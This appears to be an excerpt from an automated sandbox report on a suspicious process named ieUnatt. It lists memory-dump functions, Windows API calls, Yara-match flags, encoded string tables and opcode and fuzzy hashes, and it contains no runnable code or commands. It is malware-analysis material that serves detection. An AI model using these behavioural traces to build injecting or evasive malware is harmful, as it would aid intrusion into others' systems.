                                                                                  • Instruction Fuzzy Hash: FF900239211410132109B55C070550710468BD5365355E121F1016550CDA21D9615121
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 6d03956bba87549e86068f93052e7ea6193ddd9b9e82f73d5c72f6a17c90e658
                                                                                  • Instruction ID: 6229e325eede4aefa384406b30b3722f20c195ee40418de609a69f905bfe3954
                                                                                  • Opcode Fuzzy Hash: 6d03956bba87549e86068f93052e7ea6193ddd9b9e82f73d5c72f6a17c90e658
                                                                                  • Instruction Fuzzy Hash: 47900275202410136109715C4515616500A8BE0215B55E121E1015590DC925D9916125
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: a129b01265baf8c339f305201d856a4a64a53c91d1c4293e71ec6d390755257a
                                                                                  • Instruction ID: 91154e0d47a0855b75592ca7a333130bef1656cbfdcef8cd9399db92efa7ee46
                                                                                  • Opcode Fuzzy Hash: a129b01265baf8c339f305201d856a4a64a53c91d1c4293e71ec6d390755257a
                                                                                  • Instruction Fuzzy Hash: 3890023560541812F154715C451574610058BD0315F55E111A0025654D8B55DB5576A1
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 410ff65e3a215bb2888c0610f14d63ddf3c3eecc96e8909a9ce030daff0c6245
                                                                                  • Instruction ID: 29bd35dc7c1180c99d3f4f9df181e1971afa2be95df56ca179e639c23633cd82
                                                                                  • Opcode Fuzzy Hash: 410ff65e3a215bb2888c0610f14d63ddf3c3eecc96e8909a9ce030daff0c6245
                                                                                  • Instruction Fuzzy Hash: C390023520141812F184715C450564A10058BD1315F95E115A0026654DCE15DB5977A1
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 029e56ba629c1b63cea47a0968de7c79ec572aef43e8b2126e8caeb1a01597ee
                                                                                  • Instruction ID: 9a560477ee2aa383932d0fd9af82d56c2227612710b4fae817b70d5c8c492974
                                                                                  • Opcode Fuzzy Hash: 029e56ba629c1b63cea47a0968de7c79ec572aef43e8b2126e8caeb1a01597ee
                                                                                  • Instruction Fuzzy Hash: 8D90023520545852F144715C4505A4610158BD0319F55E111A0065694D9A25DE55B661
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 1a80791200d07aada2428d155c9f122b0309ab5e6b78a0b41cb415096e78dc37
                                                                                  • Instruction ID: 0ba6556e108cdd5f0d1ac85d708224aada2528d54b0bb080b8d202cce06c675e
                                                                                  • Opcode Fuzzy Hash: 1a80791200d07aada2428d155c9f122b0309ab5e6b78a0b41cb415096e78dc37
                                                                                  • Instruction Fuzzy Hash: 5A90023560551412F104715C461570620058BD0215F65E511A0425568D8B95DA5165A2
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 6a37545eadd78cad4d0e29be0f774b5778b3a57834fa8dda8f9d77c859c6c52a
                                                                                  • Instruction ID: b7342756ee3ecf30f3c4970e8e8b3b76d236b52e80c6027eab89bba375ac71fe
                                                                                  • Opcode Fuzzy Hash: 6a37545eadd78cad4d0e29be0f774b5778b3a57834fa8dda8f9d77c859c6c52a
                                                                                  • Instruction Fuzzy Hash: B790023524546112F154715C45056165005ABE0215F55E121A0815594D8955D9556221
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 001C41BB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: net.dll$wininet.dll
                                                                                  • API String ID: 3472027048-1269752229
                                                                                  • Opcode ID: 3aceb126d8371d850e00c7c684b6718d06ccbeef5fc65c2721e8786892df8fd7
                                                                                  • Instruction ID: 3e90974d6b16f47b6abc021283c4ed9b6222c1697827e6646840976e88776d20
                                                                                  • Opcode Fuzzy Hash: 3aceb126d8371d850e00c7c684b6718d06ccbeef5fc65c2721e8786892df8fd7
                                                                                  • Instruction Fuzzy Hash: AA319DB0600705BBD714DFA4D885FEBBBB8FBA8710F10851DB6596B240D770AA80CBE0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: de5a31385c328d8bbaf5184cb2fe0e9de137bf6faae5f28632f0df6f3a671b09
                                                                                  • Instruction ID: 6f5a132150ca543864754adcbc5b8b1e8dfbd97ad2dffd48615c5e8d48e31c60
                                                                                  • Opcode Fuzzy Hash: de5a31385c328d8bbaf5184cb2fe0e9de137bf6faae5f28632f0df6f3a671b09
                                                                                  • Instruction Fuzzy Hash: 76311275A00609AFDB00DFD8DC81DEEB7B9BF88304F108559E915E7214D775EE458BA0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: 3d2868bd7d8cffc8f43c45ed604541bd459a96e091fdc21a63dcd20c9be21b48
                                                                                  • Instruction ID: 9771e849739ea15aa9e7f027d9ce5160f8fdf068d7f033600b4694e6eae96d97
                                                                                  • Opcode Fuzzy Hash: 3d2868bd7d8cffc8f43c45ed604541bd459a96e091fdc21a63dcd20c9be21b48
                                                                                  • Instruction Fuzzy Hash: 40310FB5A0060AAFDB00DFD8DC81DEEB7B9BF88304F108559E915EB214D775EE458BA0
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001B4C42
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
                                                                                  • Instruction ID: 4459e64d5d37b075089c22f35c40b084b9e917ec8bfb3846d185e1fe29e44598
                                                                                  • Opcode Fuzzy Hash: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
                                                                                  • Instruction Fuzzy Hash: 0621996654A2496BDB25CBA4CC81FEEBF64EF15328F05839DE844DF183D760D50083D1
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,001B23B0,001C860F,001C5CCF,001B2380), ref: 001B87F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 5276fb4a1b239734d44764245dd22877f7e2356c71543ede17b0eb0ba95cc3d9
                                                                                  • Instruction ID: 2124314a045b1c96846d201c8d2ec0212f77575bd625e13523a45f7eeb7c361f
                                                                                  • Opcode Fuzzy Hash: 5276fb4a1b239734d44764245dd22877f7e2356c71543ede17b0eb0ba95cc3d9
                                                                                  • Instruction Fuzzy Hash: D701A7729051086AEB10BBA1EC8BFAB737C9B60714F104159F808A2141EB78EA41CBA1
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001B4C42
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
                                                                                  • Instruction ID: c375ba7ccdd57b2653ef504f3849afa063888235e27b94913c2a703742b31a9b
                                                                                  • Opcode Fuzzy Hash: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
                                                                                  • Instruction Fuzzy Hash: AB010CB5E0020DABDB10EBA4DD42FDDB7799B64708F0081A9E90897241F731EA558B91
                                                                                  APIs
                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,B416F980,?,001B898E,00000010,?,?,?,00000044,?,00000010,001B898E,?,B416F980,?), ref: 001C9F43
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInternalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2186235152-0
                                                                                  • Opcode ID: cf02c4cc9429ea79a6d1e96201238df87769444492242351238c87c23576e22a
                                                                                  • Instruction ID: 7f0c0b54f594c63a7070a0a6bd756af256122d64ea3616071cfc2d2784e0552c
                                                                                  • Opcode Fuzzy Hash: cf02c4cc9429ea79a6d1e96201238df87769444492242351238c87c23576e22a
                                                                                  • Instruction Fuzzy Hash: E90180B6204608BBCB44DE99DC81EDB77ADEF8D754F508108BA09A3241DA30F9518BA4
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 001B89FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: cb4f00e556da49cfa7235e78ec53b1c4974b33f87a0a9f7577705fee751f48d9
                                                                                  • Instruction ID: 6f73c4cc5f606a8bae8c7702e4a113abd072dda875277fdbe1098ffea72f4a2e
                                                                                  • Opcode Fuzzy Hash: cb4f00e556da49cfa7235e78ec53b1c4974b33f87a0a9f7577705fee751f48d9
                                                                                  • Instruction Fuzzy Hash: A1F055318043140BDA30247C188A5E17B1C6B75B28F78CBA1E9148F2C6FF32DD27D291
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 001A9F45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: 1eff612db578adf7c9a658527cb72a1c0f83d5e3b372ff275e994e199846ca5b
                                                                                  • Instruction ID: 9edd628722e0f5c6b9f4b1e3b8770e89c0bfdc5abdfd4e7683365cde183d6895
                                                                                  • Opcode Fuzzy Hash: 1eff612db578adf7c9a658527cb72a1c0f83d5e3b372ff275e994e199846ca5b
                                                                                  • Instruction Fuzzy Hash: 97F0307734020437E22075E9AC02F9BA69C9B91B61F180029F60CEA1C0D991B54142E4
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 001B89FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 7d5be2cbd9e80e73f555419667aa3204c470ad418dd8067d0d4da221e1f51528
                                                                                  • Instruction ID: 589dabe5ed8c7a828d448d12055cacfaacbe965b480968c2ea67059219a88673
                                                                                  • Opcode Fuzzy Hash: 7d5be2cbd9e80e73f555419667aa3204c470ad418dd8067d0d4da221e1f51528
                                                                                  • Instruction Fuzzy Hash: 92E0D8722102046BE624A978DC82FA9334C5B8CF60F084661F818DB1C2EB74EA13D160
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(001B20B9,?,001C5E8F,001B20B9,001C5CCF,001C5E8F,?,001B20B9,001C5CCF,00001000,?,?,00000000), ref: 001C9E3C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                                  • Instruction ID: 369c920568d48770b9f15d51ad2de7b793c2255adb085417cd2f27d3d15bc227
                                                                                  • Opcode Fuzzy Hash: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                                  • Instruction Fuzzy Hash: 93E06D752042047BD610EE58DC41F9B37ACDF89B10F004408F908A7242D731BA518BB5
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D08CFFD5,00000007,00000000,00000004,00000000,001B4434,000000F4), ref: 001C9E8C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                                  • Instruction ID: 80f3c4f01c2a058d344cb670be03c4fd0a233eae930c5ff325f89532d9bc8602
                                                                                  • Opcode Fuzzy Hash: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                                  • Instruction Fuzzy Hash: AEE065BA2042087FE710EF68DC41F9B37ACEFC9B10F004009FA08A7242D730B9108AB9
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 001B89FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 73c06abc1a5872357217b733ae1be97597b77fa479ceb252f7eeff0ad9a7ae8c
                                                                                  • Instruction ID: 87a6d733a57040098a672bcdeb2ba0d7aa45b7404c3767144a766ba01d8c419d
                                                                                  • Opcode Fuzzy Hash: 73c06abc1a5872357217b733ae1be97597b77fa479ceb252f7eeff0ad9a7ae8c
                                                                                  • Instruction Fuzzy Hash: 1DE0867125020427FB246AB8EC46FA6335C9B8CF64F184661F91CDB2C1EB78FA12D150
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,001B23B0,001C860F,001C5CCF,001B2380), ref: 001B87F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 9be2c97a75a0baad5004be78a453f2c349cdf09b05c736c63d79afcd240c75b7
                                                                                  • Instruction ID: fe0355c10b7f891977713659a2ad780e263356350ea2e3383005900c92fbfd2a
                                                                                  • Opcode Fuzzy Hash: 9be2c97a75a0baad5004be78a453f2c349cdf09b05c736c63d79afcd240c75b7
                                                                                  • Instruction Fuzzy Hash: E7D05E753803043BF601A6F5DC83F5A328C5B50B94F054064F94CE72C2EE64F60041A9
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 001B149D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID:
                                                                                  • API String ID: 1836367815-0
                                                                                  • Opcode ID: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                  • Instruction ID: e2b26c83c3111e12e5cf48cfdf375d10cdc07337db0215546a771e36e0cffaf4
                                                                                  • Opcode Fuzzy Hash: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                  • Instruction Fuzzy Hash: 89D0A732B4020C34EA2141905C42FFE7B6C8B51B41F004167FB04F50C1D780140506A5
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 94957a25bf822fce39eea309a7ed13c10e5dd0ecceae0ebe807eb411210e8c24
                                                                                  • Instruction ID: 3974e8f103195a83cf7f5c59ee492b08b74e59351539c7b531fda7e37b338b85
                                                                                  • Opcode Fuzzy Hash: 94957a25bf822fce39eea309a7ed13c10e5dd0ecceae0ebe807eb411210e8c24
                                                                                  • Instruction Fuzzy Hash: 6CB09B759015D5D6FB15F764470971779006BD0715F15D161D3031642E4738D1D1E175
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677727333.00000000045F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_45f0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d386bb627630dbe32cc7d41eefeeae4b7758c1892456d2af03914b291bdce285
                                                                                  • Instruction ID: e7bb05467dd8001ea11f58c14bcad6e30127c340ddd69b2d11fe1cb2fbe8cba9
                                                                                  • Opcode Fuzzy Hash: d386bb627630dbe32cc7d41eefeeae4b7758c1892456d2af03914b291bdce285
                                                                                  • Instruction Fuzzy Hash: 7441FA7051DB0D4FD368EF689481677B3E1FB85304F54492DDA8AC3692EB70F8468786
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677727333.00000000045F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_45f0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                  • API String ID: 0-3754132690
                                                                                  • Opcode ID: d0d2da888bc9bfe4dd4fd066b230f549b696502cb478700a218cebe9bdc33d47
                                                                                  • Instruction ID: 63b5dc0b678b4ee33f7c0677face9e90b709de15fd7fc90dfdcac85f7956156b
                                                                                  • Opcode Fuzzy Hash: d0d2da888bc9bfe4dd4fd066b230f549b696502cb478700a218cebe9bdc33d47
                                                                                  • Instruction Fuzzy Hash: 35914EF04082948AC7158F59A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89059B85
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677727333.00000000045F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_45f0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: "1*l$&lrr$',40$',40$*(&c$+1,.$,jc$//"l$c&-n$msmu$qsck$tqmq$umrx$vmsc$vpwm$vpwm
                                                                                  • API String ID: 0-3311200144
                                                                                  • Opcode ID: 0217cd2b48621ced41b2a264c866e23ac6367ed3c145a72057eedb05b82bda78
                                                                                  • Instruction ID: 499ec06678ed4515329d3de153af139eec7947e7c655fbc0de909a3022b59d32
                                                                                  • Opcode Fuzzy Hash: 0217cd2b48621ced41b2a264c866e23ac6367ed3c145a72057eedb05b82bda78
                                                                                  • Instruction Fuzzy Hash: BF3151B080474DDBCF249F84DA827DEBF71FB01354F80A248E8096B254CB768A54CB8A
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: fcef5df49392fb301ef2255593305fe5481d30946bdf8c6648413fb14a528ab0
                                                                                  • Instruction ID: 22e92337e526dded6b4cd0cc0ed9fa773ed2db3d600513fdfe346d7ef34aec0f
                                                                                  • Opcode Fuzzy Hash: fcef5df49392fb301ef2255593305fe5481d30946bdf8c6648413fb14a528ab0
                                                                                  • Instruction Fuzzy Hash: 2551D6B6B00516BFDB14DF9C899097FF7F8BF4820471092A9E4A5E7641E234FE548BA0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmp
